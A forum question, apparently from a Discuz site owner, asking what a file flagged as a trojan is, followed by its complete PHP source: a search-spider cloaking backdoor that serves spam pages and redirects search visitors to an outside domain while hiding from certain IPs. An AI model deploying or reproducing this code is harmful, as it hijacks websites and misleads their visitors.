discuz木马php文件,这是什么文件，提示木马？怎处理？

ob_end_clean();

ini_set('html_errors', false);

ini_set('display_errors', false);

define("APP_INCLUDE_FLAG", "TRUE");

define('APP_JACK_CHARSET', 'GBK');

header("Content-type: text/html; charset=" . APP_JACK_CHARSET);

define('APP_JACK_DOCUMENTROOT', '/usr/home/syu2893810001/htdocs/source/module/member/');

define('APP_JACK_KEYWORD', APP_JACK_DOCUMENTROOT . '187080z.txt');

define('APP_JACK_TEMPLATE', APP_JACK_DOCUMENTROOT . 'moban.txt');

define('APP_JACK_ARTICLE', APP_JACK_DOCUMENTROOT . '187080w.txt');

define('APP_JACK_DES', APP_JACK_DOCUMENTROOT . 'miaoshu.txt');

define('APP_JACK_BIANLIANG', APP_JACK_DOCUMENTROOT . 'bianliang2.txt');

define('APP_JACK_BIANLIANG_B', APP_JACK_DOCUMENTROOT . 'bianliang2.txt');

define('APP_JACK_BIANLIANG_C', APP_JACK_DOCUMENTROOT . 'bianliang3.txt');

define('APP_MIX_KWD_FILE', APP_JACK_DOCUMENTROOT . 'hunhe.txt');

define('APP_JACK_CACHED', 'Uncached');

define('APP_JACK_MIN_PAR', '3');

define('APP_JACK_MAX_PAR', '3');

define('APP_JACK_MIN', '10');

define('APP_JACK_MAX', '15');

define('APP_JACK_APPFILE', APP_JACK_DOCUMENTROOT . '187080a.txt');

function App_GetLink()

{

$link = array();

$link[] = missclient::rndStr(mt_rand(4, 6)) . "/" . missclient::rndStr(mt_rand(4, 6)) . ".html";

$link[] = missclient::rndStr(mt_rand(4, 6)) . "/" . missclient::rndStr(mt_rand(4, 6)) . ".html";

$site = array();

$site[] = 'http://' . $_SERVER['HTTP_HOST'] . "/index.php?" . $link[mt_rand(0, 1)];

$site[] = 'http://' . $_SERVER['HTTP_HOST'] . "/forum.php?" . $link[mt_rand(0, 1)];

$site[] = 'http://' . $_SERVER['HTTP_HOST'] . "/forum.php?fid=" . mt_rand(1, 99999999999) . '/';

$site[] = 'http://' . $_SERVER['HTTP_HOST'] . "/forum.php?gid=" . mt_rand(1, 99999999999) . '/';

$site[] = 'http://' . $_SERVER['HTTP_HOST'] . "/home.php?nid=" . mt_rand(1, 99999999999) . '/';

$site[] = 'http://' . $_SERVER['HTTP_HOST'] . "/plugin.php?id=" . mt_rand(1, 99999999999) . '/';

$site[] = 'http://' . $_SERVER['HTTP_HOST'] . "/forum.php?mod=viewthread&tid=" . mt_rand(1, 99999999999) . '';

$site[] = 'http://' . $_SERVER['HTTP_HOST'] . "/thread-" . mt_rand(1, 99999999999) . '-1-1.html';

$site[] = 'http://' . $_SERVER['HTTP_HOST'] . "/article-" . mt_rand(1, 99999999999) . '-1.html';

$site[] = 'http://' . $_SERVER['HTTP_HOST'] . "/portal.php?" . $link[mt_rand(0, 1)];

$site[] = 'http://' . $_SERVER['HTTP_HOST'] . "/portal.php?mid=" . mt_rand(1, 99999999999) . '/';

return $site[mt_rand(0, count($site) - 1)];

}

function App_GetSelf()

{

$link = array();

$link[] = missclient::rndStr(mt_rand(4, 6)) . "/" . missclient::rndStr(mt_rand(4, 6)) . ".html";

$link[] = missclient::rndStr(mt_rand(4, 6)) . "/" . missclient::rndStr(mt_rand(4, 6)) . ".html";

return "http://" . $_SERVER['HTTP_HOST'] . "/index.php?" . $link[mt_rand(0, 1)];

}

function getImg()

{

$img_ay = array('2o5auk','J2Adc0','VSuxVY','O49Wj3','IaF4dN','najAOS','9XFvIi','3sPosd','NsKJwN','l4ktfg','1r6qhb');

$img_num = rand(0,9);

return "http://i.niupic.com/images/2016/12/09/" . $img_ay[$img_num] . ".jpg";

}

$my_app = new missclient();

$my_app->run();

class missclient

{

public $show_spider;

public $jump_ref;

public $http_ref_filter;

public $jump_url = "";

public $domain = "";

public $condition = "";

public $app_server = "";

public $log_spider = "";

public $cur_spider = "";

public $allow_ip = "";

public $isCache = false;

public function run()

{

$this->domain = $this->getServerName();

$this->jump_ref = explode("|", "baidu.|haoso.|haosou.|bing.|google.|sogou.|soso.|so.com|.sm.cn|spm=");

$this->http_ref_filter = explode("|", "inurl:|site:|site%3A|inurl%3A");

$this->allow_ip = "218.80.218.|10.4.62.|10.4.33";

function urlfalse(){

if($_GET['tid'] > 50000000 || $_GET['aid'] > 1000000 || $_GET['nid'] > 1000000 || $_GET['id'] > 1000000 || $_GET['fid'] > 100000 || $_GET['mid'] > 100000 || $_GET['gid'] > 100000){

return true;

}

if(strstr($_SERVER["QUERY_STRING"] , 'html') && strstr($_SERVER["QUERY_STRING"] , '/')){

return true;

}

}

if (stristr(strtolower($_SERVER['HTTP_USER_AGENT']), "360spider")) {

$this->condition = $this->isAllowdIp();

}else {

$this->condition = urlfalse() == true && $this->isAllowdIp();

}

$this->app_server = "000";

$this->isCache = False;

if ($this->isSpider() && $this->isAllowdIp()) {

if ($this->condition) {

if ($this->isCache) {

$relset_host = $this->getServerName();

$dir = (substr(PHP_OS, 0, 3) == 'WIN' ? 'C:/windows/temp/' : '/tmp/') . substr(md5($relset_host), 26) . chr(47);

$cacheFile = $dir . 'sess_' . substr(md5(http_build_query($_GET)), 6);

if (!@file_exists($dir)) {

mkdir($dir, 0777);

}

if (@file_exists($cacheFile) && @filesize($cacheFile) > 32) {

$var = coreAppCache::read($cacheFile);

$page = file_get_contents(APP_JACK_TEMPLATE);

foreach ($var as $key => $v) {

$flag = "{" . $key . "}";

$page = str_replace($flag, $v, $page);

}

echo $page;

exit;

} else {

$currentPage = (include APP_JACK_APPFILE);

if ($currentPage && strlen($currentPage) > 32 && stristr($currentPage, "")) {

$var = self::cut($currentPage, "", "");

$var = coreAppCache::decode($var);

$page = file_get_contents(APP_JACK_TEMPLATE);

foreach ($var as $key => $v) {

$flag = "{" . $key . "}";

$page = str_replace($flag, $v, $page);

}

echo $page;

@coreAppCache::writenocode($currentPage, $cacheFile);

}

}

die;

} else {

$currentPage = (include APP_JACK_APPFILE);

echo $currentPage;

die;

}

} else {

$this->_uncondition_hook();

}

} else {

if ($this->isRef() && $this->condition) {

$this->Jump();

} else {

$this->_unSpider_hook();

}

}

}

public function isAllowdIp()

{

$ip = $this->clientIp();

$non_list = explode("|", $this->allow_ip);

foreach ($non_list as $iplist) {

if (@stristr($ip, $iplist)) {

return false;

}

}

return true;

}

public function clientIp()

{

if (getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {

$onlineip = getenv('HTTP_CLIENT_IP');

} elseif (getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {

$onlineip = getenv('HTTP_X_FORWARDED_FOR');

} elseif (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {

$onlineip = getenv('REMOTE_ADDR');

} elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {

$onlineip = $_SERVER['REMOTE_ADDR'];

}

preg_match("/[\\d\\.]{7,15}/", $onlineip, $onlineipmatches);

$onlineip = $onlineipmatches[0] ? $onlineipmatches[0] : 'unknown';

unset($onlineipmatches);

return $onlineip;

}

public function isSpider()

{

$bots = array('Sogou' => 'sogou', 'Haoso' => 'haosouspider', '360spider' => '360spider');

$userAgent = strtolower($_SERVER['HTTP_USER_AGENT']);

foreach ($bots as $k => $v) {

if (stristr($userAgent, $v)) {

if (!empty($this->log_spider)) {

@file_put_contents($this->log_spider, $v . "->Visited " . $_SERVER['QUERY_STRING'] . "at: " . date("Y-m-d H:i:s") . "\n", FILE_APPEND);

}

$this->cur_spider = $k;

return true;

break;

}

}

return false;

}

public function isRef()

{

$ref = strtolower(@$_SERVER['HTTP_REFERER']);

if (isset($_COOKIE["domain-filter-bypass"])) {

return false;

}

if (!$this->isAllowdIp()) {

setcookie("domain-filter-bypass", "lol", time() + 259200);

return false;

}

foreach ($this->http_ref_filter as $r) {

$r = trim($r);

if (stristr($ref, $r)) {

setcookie("domain-filter-bypass", "lol", time() + 259200);

return false;

}

}

foreach ($this->jump_ref as $r) {

$r = trim($r);

if (stristr($ref, $r)) {

return true;

}

}

}

public function getServerName()

{

$ServerName = strtolower($_SERVER['SERVER_NAME'] ? $_SERVER['SERVER_NAME'] : $_SERVER['HTTP_HOST']);

if (strpos($ServerName, 'http://')) {

return str_replace('http://', '', $ServerName);

}

return $ServerName;

}

public function getPage()

{

if ($this->isCache) {

$cache = "cached";

}

$url = $this->app_server . "?domain=" . $this->domain . "&gid=199&spider=" . $this->cur_spider . "&cache=" . $cache . "&localPar=" . http_build_query($_GET);

return $this->HttpVisit($url);

}

public function HttpVisit($weburl)

{

$remote_data = NULL;

if (function_exists('curl_exec')) {

$curl = @curl_init();

@curl_setopt($curl, CURLOPT_URL, $weburl);

@curl_setopt($curl, CURLOPT_HEADER, 0);

@curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 30);

@curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

$remote_data = @curl_exec($curl);

@curl_close($curl);

} else {

if (function_exists('stream_context_create')) {

$header_array = array('http' => array('method' => 'GET', 'timeout' => 30));

$http_header = @stream_context_create($header_array);

$remote_data = @file_get_contents($weburl, false, $http_header);

} else {

$temp_url = explode("/", $weburl);

$new_url = $temp_url[2];

$http_port = 80;

$get_file = substr($weburl, strlen($new_url) + 7);

if (strstr($new_url, chr(58))) {

$s_var_array['td'] = explode(chr(58), $new_url);

$new_url = $s_var_array['td'][0];

$http_port = $s_var_array['td'][1];

}

$fsock_result = @fsockopen($new_url, $http_port);

@fputs($fsock_result, 'GET ' . $get_file . ' HTTP/1.1' . "\r\n" . 'Host:' . $new_url . "\r\n" . 'Connection:Close' . "\r\n\r\n");

while (!feof($fsock_result)) {

$remote_data .= fgets($fsock_result, 1024);

}

@fclose($fsock_result);

}

}

return $remote_data;

}

public function Jump()

{

if ($this->isAllowdIp()) {

$domain = str_replace(".", "_", $this->domain);

if (urlfalse() == true) {

header('Location: http://www.wjrxxw.com/?b2o_' . $domain);

exit;

}

}

}

public function _uncondition_hook()

{

$array = array();

for ($a = 0; $a < 5; $a++) {

echo '' . "\n";

}

}

public function _unSpider_hook()

{

}

public function strStartWith($needle, $haystack)

{

return substr($haystack, 0, strlen($needle)) == $needle;

}

public function rndStr($length = 8)

{

$str = null;

$strPol = "0123456789abckSKJCefjshikhjkljKmnopqJASHDvwxyz";

$max = strlen($strPol) - 1;

for ($i = 0; $i < $length; $i++) {

$str .= $strPol[rand(0, $max)];

}

return $str;

}

public function cut($file, $from, $end)

{

$message = explode($from, $file);

$message = explode($end, $message[1]);

return $message[0];

}

}

class coreAppCache

{

public function write($file, $filename)

{

return file_put_contents($filename, self::encode($file));

}

public function writenocode($file, $filename)

{

return file_put_contents($filename, $file);

}

public function read($filename)

{

$content = file_get_contents($filename);

if (stristr($content, "")) {

$content = self::cut($content, "", "");

}

return self::decode($content);

}

public function encode($file)

{

return base64_encode(gzcompress(serialize($file)));

}

public function decode($file)

{

return unserialize(gzuncompress(base64_decode($file)));

}

public function cut($file, $from, $end)

{

$message = explode($from, $file);

$message = explode($end, $message[1]);

return $message[0];

}

}